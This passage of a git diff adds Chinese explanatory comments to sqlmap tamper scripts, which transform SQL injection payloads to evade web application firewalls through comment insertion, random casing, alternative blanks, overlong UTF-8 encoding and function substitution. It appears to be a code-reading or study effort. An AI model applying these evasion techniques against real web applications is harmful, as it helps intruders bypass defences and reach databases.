+        # 正则表达式(?i)\bORD\( 匹配ORD关键字，忽略大小写，并且确保是完整的单词边界
         retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/overlongutf8.py b/src/sqlmap-master/tamper/overlongutf8.py
index 5945356..9fcd81b 100644
--- a/src/sqlmap-master/tamper/overlongutf8.py
+++ b/src/sqlmap-master/tamper/overlongutf8.py
@@ -32,14 +32,19 @@ def tamper(payload, **kwargs):
         retVal = ""
         i = 0
 
+        # 遍历payload中的每个字符
         while i < len(payload):
+            # 如果当前字符是%，并且后面两个字符是十六进制数字，则认为这是一个已经编码的字符
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                 retVal += payload[i:i + 3]
                 i += 3
             else:
+                # 如果当前字符不是字母或数字，则将其转换为overlong UTF8编码
                 if payload[i] not in (string.ascii_letters + string.digits):
+                    # 计算并添加overlong UTF8编码
                     retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
                 else:
+                    # 如果是字母或数字，则直接添加到结果中
                     retVal += payload[i]
                 i += 1
 
diff --git a/src/sqlmap-master/tamper/overlongutf8more.py b/src/sqlmap-master/tamper/overlongutf8more.py
index e713745..fd5a7d0 100644
--- a/src/sqlmap-master/tamper/overlongutf8more.py
+++ b/src/sqlmap-master/tamper/overlongutf8more.py
@@ -33,10 +33,13 @@ def tamper(payload, **kwargs):
         i = 0
 
         while i < len(payload):
+            # 如果当前字符是%，并且后面两个字符是十六进制数字，则认为这是一个已经编码的字符
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                 retVal += payload[i:i + 3]
                 i += 3
             else:
+                # 将当前字符转换为overlong UTF8编码
+                # 每个字符被编码为两个字节，第一个字节的高位设置为10（0xC0），第二个字节的高位设置为10（0x80）
                 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
                 i += 1
 
diff --git a/src/sqlmap-master/tamper/percentage.py b/src/sqlmap-master/tamper/percentage.py
index 9d62e60..3b772b1 100644
--- a/src/sqlmap-master/tamper/percentage.py
+++ b/src/sqlmap-master/tamper/percentage.py
@@ -13,7 +13,9 @@ from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOW
 
+# 定义dependencies函数，用于在运行tamper脚本时显示警告信息
 def dependencies():
+    # 显示单次警告消息，告知用户这个tamper脚本只针对ASP web应用程序
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0])
 
 def tamper(payload, **kwargs):
@@ -40,10 +42,12 @@ def tamper(payload, **kwargs):
         i = 0
 
         while i < len(payload):
+            # 如果当前字符是%，并且后面两个字符是十六进制数字，则认为这是一个已经编码的字符
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                 retVal += payload[i:i + 3]
                 i += 3
             elif payload[i] != ' ':
+                # 如果当前字符不是空格，则在其前面添加百分号
                 retVal += '%%%s' % payload[i]
                 i += 1
             else:
diff --git a/src/sqlmap-master/tamper/plus2concat.py b/src/sqlmap-master/tamper/plus2concat.py
index 3b910f8..2499c81 100644
--- a/src/sqlmap-master/tamper/plus2concat.py
+++ b/src/sqlmap-master/tamper/plus2concat.py
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 import os
 import re
 
+# 从sqlmap的库中导入单次警告消息函数、零深度搜索函数、数据库管理系统枚举和优先级枚举
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import zeroDepthSearch
 from lib.core.enums import DBMS
@@ -16,6 +17,7 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
+    # 显示单次警告消息，告知用户这个tamper脚本只针对Microsoft SQL Server数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
 
 def tamper(payload, **kwargs):
@@ -41,15 +43,20 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式搜索payload中由'+'连接的CHAR()函数或单引号字符串
         match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
         if match:
             part = match.group(0)
 
+            # 将匹配的部分拆分为字符列表
             chars = [char for char in part]
+            # 使用zeroDepthSearch函数找到所有的'+'字符位置
             for index in zeroDepthSearch(part, '+'):
+                # 将'+'字符替换为','字符
                 chars[index] = ','
-
+            # 构造CONCAT函数的字符串表示
             replacement = "CONCAT(%s)" % "".join(chars)
+            # 将原始的由'+'连接的部分替换为CONCAT函数
             retVal = retVal.replace(part, replacement)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/plus2fnconcat.py b/src/sqlmap-master/tamper/plus2fnconcat.py
index ab1005a..8d8ce60 100644
--- a/src/sqlmap-master/tamper/plus2fnconcat.py
+++ b/src/sqlmap-master/tamper/plus2fnconcat.py
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 import os
 import re
 
+# 从sqlmap的库中导入单次警告消息函数、零深度搜索函数、兼容模块中的xrange函数、数据库管理系统枚举和优先级枚举
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import zeroDepthSearch
 from lib.core.compat import xrange
@@ -17,6 +18,7 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
+    # 显示单次警告消息，告知用户这个tamper脚本只针对Microsoft SQL Server数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
 
 def tamper(payload, **kwargs):
@@ -43,22 +45,26 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式搜索payload中由'+'连接的CHAR()函数或单引号字符串
         match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
         if match:
             old = match.group(0)
             parts = []
             last = 0
 
+            # 使用zeroDepthSearch函数找到所有的'+'字符位置
             for index in zeroDepthSearch(old, '+'):
+                # 将每个'+'字符之间的部分作为单独的部分存储
                 parts.append(old[last:index].strip('+'))
                 last = index
-
+            # 将最后一个'+'字符之后的部分也加入到parts列表中
             parts.append(old[last:].strip('+'))
             replacement = parts[0]
 
+            # 遍历parts列表，构造{fn CONCAT()}函数的嵌套调用
             for i in xrange(1, len(parts)):
                 replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i])
-
+            # 将原始的由'+'连接的部分替换为{fn CONCAT()}函数
             retVal = retVal.replace(old, replacement)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/randomcase.py b/src/sqlmap-master/tamper/randomcase.py
index 8cb02a8..5a48763 100644
--- a/src/sqlmap-master/tamper/randomcase.py
+++ b/src/sqlmap-master/tamper/randomcase.py
@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 import re
 
+# 从sqlmap的库中导入随机范围函数、兼容模块中的xrange函数、知识库和优先级枚举
 from lib.core.common import randomRange
 from lib.core.compat import xrange
 from lib.core.data import kb
@@ -48,19 +49,22 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式找到payload中的所有关键字（至少两个字母或下划线的单词）
         for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal):
             word = match.group()
-
+            # 如果单词是SQL关键字，并且不是被引号或括号包围的，或者是一个函数名
             if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload:
+                # 生成一个随机大小写混合的单词
                 while True:
                     _ = ""
 
                     for i in xrange(len(word)):
+                        # 随机选择大写或小写
                         _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
-
+                    # 确保生成的单词不是全大写或全小写，并退出循环
                     if len(_) > 1 and _ not in (_.lower(), _.upper()):
                         break
-
+                # 将原始的单词替换为随机大小写混合的单词            
                 retVal = retVal.replace(word, _)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/randomcomments.py b/src/sqlmap-master/tamper/randomcomments.py
index edf4cba..b0963a3 100644
--- a/src/sqlmap-master/tamper/randomcomments.py
+++ b/src/sqlmap-master/tamper/randomcomments.py
@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 import re
 
+# 从sqlmap的库中导入随机范围函数、兼容模块中的xrange函数、知识库和优先级枚举
 from lib.core.common import randomRange
 from lib.core.compat import xrange
 from lib.core.data import kb
@@ -27,24 +28,28 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式找到payload中的所有单词（至少一个字母或下划线）
         for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
             word = match.group()
 
+            # 跳过长度小于2的单词
             if len(word) < 2:
                 continue
 
+            # 如果单词是SQL关键字        
             if word.upper() in kb.keywords:
-                _ = word[0]
-
+                _ = word[0]  # 从单词的第一个字符开始构造新的字符串
+                # 遍历单词的每个字符（除了第一个和最后一个）
                 for i in xrange(1, len(word) - 1):
+                    # 随机决定是否插入注释
                     _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
-
+                # 添加单词的最后一个字符
                 _ += word[-1]
-
+                # 如果没有插入任何注释，则随机选择一个位置插入注释
                 if "/**/" not in _:
                     index = randomRange(1, len(word) - 1)
                     _ = word[:index] + "/**/" + word[index:]
-
+                # 将原始的单词替换为插入了注释的新字符串
                 retVal = retVal.replace(word, _)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/schemasplit.py b/src/sqlmap-master/tamper/schemasplit.py
index 07ad37d..8245f08 100644
--- a/src/sqlmap-master/tamper/schemasplit.py
+++ b/src/sqlmap-master/tamper/schemasplit.py
@@ -27,5 +27,6 @@ def tamper(payload, **kwargs):
     >>> tamper('SELECT id FROM testdb.users')
     'SELECT id FROM testdb 9.e.users'
     """
-
+    # 如果payload不为空，则使用正则表达式替换FROM后面数据库表名的点操作符为一个空格加上'9.e.'
+    # 这是一种绕过某些WAF规则的技术，通过插入一个看似无害的字符串'9.e.'来分割数据库名和表名
     return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload
diff --git a/src/sqlmap-master/tamper/scientific.py b/src/sqlmap-master/tamper/scientific.py
index 9b0ecf7..514b582 100644
--- a/src/sqlmap-master/tamper/scientific.py
+++ b/src/sqlmap-master/tamper/scientific.py
@@ -29,7 +29,9 @@ def tamper(payload, **kwargs):
     """
 
     if payload:
+        # 将闭合括号、逗号、点、星号、正斜杠、反斜杠、竖线、位运算符和逻辑运算符替换为" 1.e" + 原字符
         payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload)
+        # 将函数名后跟左括号替换为" 函数名 1.e("，除非函数名是MID、CAST、FROM、COUNT
         payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload)     # NOTE: MID and CAST don't work for sure
-
+    # 返回修改后的payload    
     return payload
diff --git a/src/sqlmap-master/tamper/sleep2getlock.py b/src/sqlmap-master/tamper/sleep2getlock.py
index f0b3a54..a3e35e1 100644
--- a/src/sqlmap-master/tamper/sleep2getlock.py
+++ b/src/sqlmap-master/tamper/sleep2getlock.py
@@ -34,6 +34,7 @@ def tamper(payload, **kwargs):
     """
 
     if payload:
+        # 将payload中的'SLEEP('替换为'GET_LOCK('%s',，其中'%s'会被kb.aliasName替换
         payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName)
 
     return payload
diff --git a/src/sqlmap-master/tamper/sp_password.py b/src/sqlmap-master/tamper/sp_password.py
index d23c0d5..30cc2bf 100644
--- a/src/sqlmap-master/tamper/sp_password.py
+++ b/src/sqlmap-master/tamper/sp_password.py
@@ -27,6 +27,9 @@ def tamper(payload, **kwargs):
     retVal = ""
 
     if payload:
+        # 构造返回的payload字符串
+        # 如果payload中已经包含注释符号('#'或'--')，则直接添加sp_password函数
+        # 否则，在sp_password前添加一个'-- '作为注释
         retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
 
     return retVal
diff --git a/src/sqlmap-master/tamper/space2comment.py b/src/sqlmap-master/tamper/space2comment.py
index 3229a5c..231bb1b 100644
--- a/src/sqlmap-master/tamper/space2comment.py
+++ b/src/sqlmap-master/tamper/space2comment.py
@@ -4,7 +4,7 @@
 Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
-
+# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举
 from lib.core.compat import xrange
 from lib.core.enums import PRIORITY
 
@@ -33,26 +33,28 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        retVal = ""
+        retVal = "" # 初始化引号状态标记
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果是第一个空格且之前没有遇到过空格
             if not firstspace:
                 if payload[i].isspace():
                     firstspace = True
                     retVal += "/**/"
                     continue
-
+            # 如果是单引号
             elif payload[i] == '\'':
                 quote = not quote
-
+            # 如果是双引号
             elif payload[i] == '"':
                 doublequote = not doublequote
-
+            # 如果是空格且之前没有遇到过双引号和单引号
             elif payload[i] == " " and not doublequote and not quote:
                 retVal += "/**/"
                 continue
-
+            # 添加当前字符到retVal
             retVal += payload[i]
 
     return retVal
diff --git a/src/sqlmap-master/tamper/space2dash.py b/src/sqlmap-master/tamper/space2dash.py
index 5ecb814..298d26f 100644
--- a/src/sqlmap-master/tamper/space2dash.py
+++ b/src/sqlmap-master/tamper/space2dash.py
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 import random
 import string
 
+# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举
 from lib.core.compat import xrange
 from lib.core.enums import PRIORITY
 
@@ -30,18 +31,29 @@ def tamper(payload, **kwargs):
     >>> tamper('1 AND 9227=9227')
     '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
     """
-
+    
     retVal = ""
 
     if payload:
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
-            if payload[i].isspace():
+            # 如果当前字符是空格
+            if payload[i].isspace():    
+                # 生成一个随机字符串
                 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
+                # 将随机字符串和换行符添加到retVal中
                 retVal += "--%s%%0A" % randomStr
+
+            # 如果当前字符是#或者#后面跟着两个空格
+            # 如果payload[i]等于#或者payload[i:i + 3]等于--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload[i:]添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则，将payload[i]添加到retVal中
             else:
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/space2hash.py b/src/sqlmap-master/tamper/space2hash.py
index 2cef84d..348fd20 100644
--- a/src/sqlmap-master/tamper/space2hash.py
+++ b/src/sqlmap-master/tamper/space2hash.py
@@ -16,7 +16,9 @@ from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOW
 
+# 定义一个函数，用于检查脚本依赖
 def dependencies():
+    # 输出警告信息，提示脚本只能运行在MySQL数据库上
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
 def tamper(payload, **kwargs):
@@ -41,15 +43,26 @@ def tamper(payload, **kwargs):
 
     retVal = ""
 
+    # 如果payload不为空
     if payload:
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果字符是空格
             if payload[i].isspace():
+                # 生成一个随机字符串
                 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
+                # 将随机字符串添加到retVal中
                 retVal += "%%23%s%%0A" % randomStr
+            # 如果字符是#或者字符是--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload的剩余部分添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则
             else:
+                # 将字符添加到retVal中
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/space2morecomment.py b/src/sqlmap-master/tamper/space2morecomment.py
index c5d7ec4..7cffc12 100644
--- a/src/sqlmap-master/tamper/space2morecomment.py
+++ b/src/sqlmap-master/tamper/space2morecomment.py
@@ -33,23 +33,29 @@ def tamper(payload, **kwargs):
         retVal = ""
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果第一个字符不是空格，则将firstspace设置为True，并将retVal添加"/**_**/"
             if not firstspace:
                 if payload[i].isspace():
                     firstspace = True
                     retVal += "/**_**/"
                     continue
 
+            # 如果字符是单引号，则将quote取反
             elif payload[i] == '\'':
                 quote = not quote
 
+            # 如果字符是双引号，则将doublequote取反
             elif payload[i] == '"':
                 doublequote = not doublequote
 
+            # 如果字符是空格，且不是在双引号或单引号中，则将retVal添加"/**_**/"
             elif payload[i] == " " and not doublequote and not quote:
                 retVal += "/**_**/"
                 continue
 
+            # 将字符添加到retVal中
             retVal += payload[i]
 
     return retVal
diff --git a/src/sqlmap-master/tamper/space2morehash.py b/src/sqlmap-master/tamper/space2morehash.py
index 091bb9b..8df3c21 100644
--- a/src/sqlmap-master/tamper/space2morehash.py
+++ b/src/sqlmap-master/tamper/space2morehash.py
@@ -20,6 +20,10 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
 __priority__ = PRIORITY.LOW
 
 def dependencies():
+    """
+    检查是否满足脚本运行的条件
+    """
+    # 输出警告信息，提示tamper脚本只适用于MySQL版本大于5.1.13
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
 def tamper(payload, **kwargs):
@@ -43,9 +47,13 @@ def tamper(payload, **kwargs):
     """
 
     def process(match):
+        """
+        处理匹配到的单词
+        """
         word = match.group('word')
         randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
 
+        # 如果匹配到的单词在关键词列表中，并且不在忽略空格影响的关键词列表中，则替换为随机字符串
         if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
             return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
         else:
@@ -53,16 +61,21 @@ def tamper(payload, **kwargs):
 
     retVal = ""
 
+    # 如果payload存在，则进行替换
     if payload:
         payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, payload)
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果字符是空格，则替换为随机字符串
             if payload[i].isspace():
                 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
                 retVal += "%%23%s%%0A" % randomStr
+            # 如果字符是#或者字符是--，则将payload中剩余的字符添加到retVal中，并跳出循环
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                 retVal += payload[i:]
                 break
+            # 否则将字符添加到retVal中
             else:
                 retVal += payload[i]
 
diff --git a/src/sqlmap-master/tamper/space2mssqlblank.py b/src/sqlmap-master/tamper/space2mssqlblank.py
index 5f055c8..7055f60 100644
--- a/src/sqlmap-master/tamper/space2mssqlblank.py
+++ b/src/sqlmap-master/tamper/space2mssqlblank.py
@@ -8,14 +8,20 @@ See the file 'LICENSE' for copying permission
 import os
 import random
 
+# 导入lib.core.common模块中的singleTimeWarnMessage函数
 from lib.core.common import singleTimeWarnMessage
+# 导入lib.core.compat模块中的xrange函数
 from lib.core.compat import xrange
+# 导入lib.core.enums模块中的DBMS枚举
 from lib.core.enums import DBMS
+# 导入lib.core.enums模块中的PRIORITY枚举
 from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOW
 
+# 定义一个函数，用于检查脚本依赖
 def dependencies():
+    # 输出警告信息，说明该脚本只能用于特定数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
 
 def tamper(payload, **kwargs):
@@ -53,29 +59,38 @@ def tamper(payload, **kwargs):
     #   CR      0D      carriage return
     #   SO      0E      shift out
     #   SI      0F      shift in
+    # 定义一个元组，包含一些字符串
     blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
+    # 将payload赋值给retVal
     retVal = payload
 
     if payload:
         retVal = ""
         quote, doublequote, firstspace, end = False, False, False, False
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果当前字符不是空格，则将firstspace设置为True
             if not firstspace:
                 if payload[i].isspace():
                     firstspace = True
+                    # 在retVal中添加一个随机选择的空格
                     retVal += random.choice(blanks)
                     continue
 
+            # 如果当前字符是单引号，则将quote取反
             elif payload[i] == '\'':
                 quote = not quote
 
+            # 如果当前字符是双引号，则将doublequote取反
             elif payload[i] == '"':
                 doublequote = not doublequote
 
+            # 如果当前字符是#或者--，则将end设置为True
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                 end = True
 
+            # 如果当前字符是空格，且不是在双引号或单引号中，则根据end的值添加一个随机选择的空格
             elif payload[i] == " " and not doublequote and not quote:
                 if end:
                     retVal += random.choice(blanks[:-1])
@@ -84,6 +99,7 @@ def tamper(payload, **kwargs):
 
                 continue
 
+            # 将当前字符添加到retVal中
             retVal += payload[i]
 
     return retVal
diff --git a/src/sqlmap-master/tamper/space2mssqlhash.py b/src/sqlmap-master/tamper/space2mssqlhash.py
index 67e31e6..64788a8 100644
--- a/src/sqlmap-master/tamper/space2mssqlhash.py
+++ b/src/sqlmap-master/tamper/space2mssqlhash.py
@@ -27,14 +27,24 @@ def tamper(payload, **kwargs):
 
     retVal = ""
 
+    # 如果payload不为空
     if payload:
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果字符是空格
             if payload[i].isspace():
+                # 将%23%0A添加到retVal中
                 retVal += "%23%0A"
+            # 如果字符是#或者字符是--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload的剩余部分添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则
             else:
+                # 将字符添加到retVal中
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/space2mysqlblank.py b/src/sqlmap-master/tamper/space2mysqlblank.py
index 399370c..ef81d36 100644
--- a/src/sqlmap-master/tamper/space2mysqlblank.py
+++ b/src/sqlmap-master/tamper/space2mysqlblank.py
@@ -43,30 +43,50 @@ def tamper(payload, **kwargs):
     #   CR      0D      carriage return
     #   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)
     #           A0      non-breaking space
+    # 定义一个包含特殊字符的元组
     blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
+    # 将payload赋值给retVal
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 将retVal置为空字符串
         retVal = ""
+        # 定义三个布尔变量，分别表示是否在引号内、双引号内和第一个空格
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果第一个空格为假
             if not firstspace:
+                # 如果当前字符是空格
                 if payload[i].isspace():
+                    # 将第一个空格置为真
                     firstspace = True
+                    # 将一个随机选择的特殊字符添加到retVal中
                     retVal += random.choice(blanks)
+                    # 继续下一次循环
                     continue
 
+            # 如果当前字符是单引号
             elif payload[i] == '\'':
+                # 将quote取反
                 quote = not quote
 
+            # 如果当前字符是双引号
             elif payload[i] == '"':
+                # 将doublequote取反
                 doublequote = not doublequote
 
+            # 如果当前字符是空格，且不在双引号内和单引号内
             elif payload[i] == " " and not doublequote and not quote:
+                # 将一个随机选择的特殊字符添加到retVal中
                 retVal += random.choice(blanks)
+                # 继续下一次循环
                 continue
 
+            # 将当前字符添加到retVal中
             retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/space2mysqldash.py b/src/sqlmap-master/tamper/space2mysqldash.py
index 7b64776..deffbff 100644
--- a/src/sqlmap-master/tamper/space2mysqldash.py
+++ b/src/sqlmap-master/tamper/space2mysqldash.py
@@ -7,14 +7,20 @@ See the file 'LICENSE' for copying permission
 
 import os
 
+# 从lib.core.common模块中导入singleTimeWarnMessage函数
 from lib.core.common import singleTimeWarnMessage
+# 从lib.core.compat模块中导入xrange函数
 from lib.core.compat import xrange
+# 从lib.core.enums模块中导入DBMS枚举和PRIORITY枚举
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
+# 设置脚本的优先级为LOW
 __priority__ = PRIORITY.LOW
 
+# 定义dependencies函数，用于检查脚本依赖
 def dependencies():
+    # 输出警告信息，说明该脚本只能用于MySQL数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
 def tamper(payload, **kwargs):
@@ -34,14 +40,24 @@ def tamper(payload, **kwargs):
 
     retVal = ""
 
+    # 如果payload不为空
     if payload:
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果字符是空格
             if payload[i].isspace():
+                # 将"--%0A"添加到retVal中
                 retVal += "--%0A"
+            # 如果字符是#或者字符是--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload的剩余部分添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则
             else:
+                # 将字符添加到retVal中
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/space2plus.py b/src/sqlmap-master/tamper/space2plus.py
index 45110ae..88a338d 100644
--- a/src/sqlmap-master/tamper/space2plus.py
+++ b/src/sqlmap-master/tamper/space2plus.py
@@ -5,11 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+# 导入xrange和PRIORITY
 from lib.core.compat import xrange
 from lib.core.enums import PRIORITY
 
+# 定义优先级为LOW
 __priority__ = PRIORITY.LOW
 
+# 定义依赖函数
 def dependencies():
     pass
 
@@ -27,27 +30,35 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空
     if payload:
         retVal = ""
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果第一个字符不是空格
             if not firstspace:
+                # 如果当前字符是空格
                 if payload[i].isspace():
                     firstspace = True
                     retVal += "+"
                     continue
 
+            # 如果当前字符是单引号
             elif payload[i] == '\'':
                 quote = not quote
 
+            # 如果当前字符是双引号
             elif payload[i] == '"':
                 doublequote = not doublequote
 
+            # 如果当前字符是空格，并且不在双引号和单引号中
             elif payload[i] == " " and not doublequote and not quote:
                 retVal += "+"
                 continue
 
+            # 将当前字符添加到retVal中
             retVal += payload[i]
 
     return retVal
diff --git a/src/sqlmap-master/tamper/space2randomblank.py b/src/sqlmap-master/tamper/space2randomblank.py
index 2a2cc4d..cac06ad 100644
--- a/src/sqlmap-master/tamper/space2randomblank.py
+++ b/src/sqlmap-master/tamper/space2randomblank.py
@@ -38,30 +38,50 @@ def tamper(payload, **kwargs):
     #   LF      0A      new line
     #   FF      0C      new page
     #   CR      0D      carriage return
+    # 定义一个包含特殊字符的列表
     blanks = ("%09", "%0A", "%0C", "%0D")
+    # 将payload赋值给retVal
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 将retVal置为空字符串
         retVal = ""
+        # 定义三个布尔变量，分别表示是否在引号内、双引号内和第一个空格
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果第一个字符不是空格
             if not firstspace:
+                # 如果当前字符是空格
                 if payload[i].isspace():
+                    # 将firstspace置为True
                     firstspace = True
+                    # 在retVal中添加一个随机选择的特殊字符
                     retVal += random.choice(blanks)
+                    # 继续下一次循环
                     continue
 
+            # 如果当前字符是单引号
             elif payload[i] == '\'':
+                # 将quote取反
                 quote = not quote
 
+            # 如果当前字符是双引号
             elif payload[i] == '"':
+                # 将doublequote取反
                 doublequote = not doublequote
 
+            # 如果当前字符是空格，且不在双引号和单引号内
             elif payload[i] == ' ' and not doublequote and not quote:
+                # 在retVal中添加一个随机选择的特殊字符
                 retVal += random.choice(blanks)
+                # 继续下一次循环
                 continue
 
+            # 将当前字符添加到retVal中
             retVal += payload[i]
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/substring2leftright.py b/src/sqlmap-master/tamper/substring2leftright.py
index 642e499..d993050 100644
--- a/src/sqlmap-master/tamper/substring2leftright.py
+++ b/src/sqlmap-master/tamper/substring2leftright.py
@@ -32,16 +32,26 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 在payload中查找SUBSTRING函数
         match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload)
 
+        # 如果找到了SUBSTRING函数
         if match:
+            # 获取SUBSTRING函数中的位置参数
             pos = int(match.group(2))
+            # 如果位置参数为1
             if pos == 1:
+                # 将SUBSTRING函数替换为LEFT函数
                 _ = "LEFT(%s,1)" % (match.group(1))
